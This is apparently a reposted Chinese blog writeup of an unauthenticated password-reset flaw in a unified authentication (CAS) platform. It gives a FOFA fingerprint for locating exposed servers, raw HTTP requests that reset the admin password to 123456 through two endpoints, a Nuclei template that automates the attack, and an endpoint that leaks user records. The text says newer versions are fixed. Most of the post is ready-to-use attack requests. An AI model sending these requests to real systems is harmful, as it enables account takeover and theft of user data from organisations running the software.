某通用统一任意重置

本文主要是介绍某通用统一任意重置，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

前言

一天，日常浏览公众号文章，看到一个【漏洞复现】

这一套21或22年打过的一套，简单分析一下。

统一任意重置

指纹：body=”/cas/themes/zbvc/js/jquery.min.js”
报文如下：

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
Host: 127.0.0.1
Content-Length: 46
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Application-Name: cas
Content-Type: application/json;charset=UTF-8
Connection: close{"xgh":"admin","newPass":"123456","email":""}

Poc:

id: Cas-Fengsu-template-resetPasswordBySuper
info:name: 风速统一resetPasswordBySuper任意重置author: xxxseverity: infodescription: descriptionreference:- https://metadata:fofa-query: body="/cas/themes/zbvc/js/jquery.min.js"tags: tagshttp:- raw:- |POST /cas/userCtl/resetPasswordBySuper HTTP/1.1Host: {{Hostname}}Content-Length: 47Accept: application/json, text/plain, */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Application-Name: casContent-Type: application/json;charset=UTF-8Connection: close{"xgh":"admin","newPass":"123456","email":""}matchers-condition: andmatchers:- type: wordpart: bodywords:- '密码修改成功'- type: statusstatus:- 200

验证demo：

老接口重置2：

POST /cas/userCtl/resetPassword HTTP/1.1
Host: 127.0.0.1
Content-Length: 46
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Application-Name: cas
Content-Type: application/json;charset=UTF-8
Connection: close{"xgh":"admin","newPass":"123456","email":""}

验证

重置功能点：
统一用户管理平台：用户中心
请求接口：cas/manager/user.html
重置接口：cas/userCtl/resetPasswordBySuper
最新版统一已修复上述任意重置接口
统一敏感泄露接口：cas/userCtl/getPage?name=&page=1&size=10【name可控、size可控】
demo：/cas/userCtl/getPage?name=admin&page=1&size=10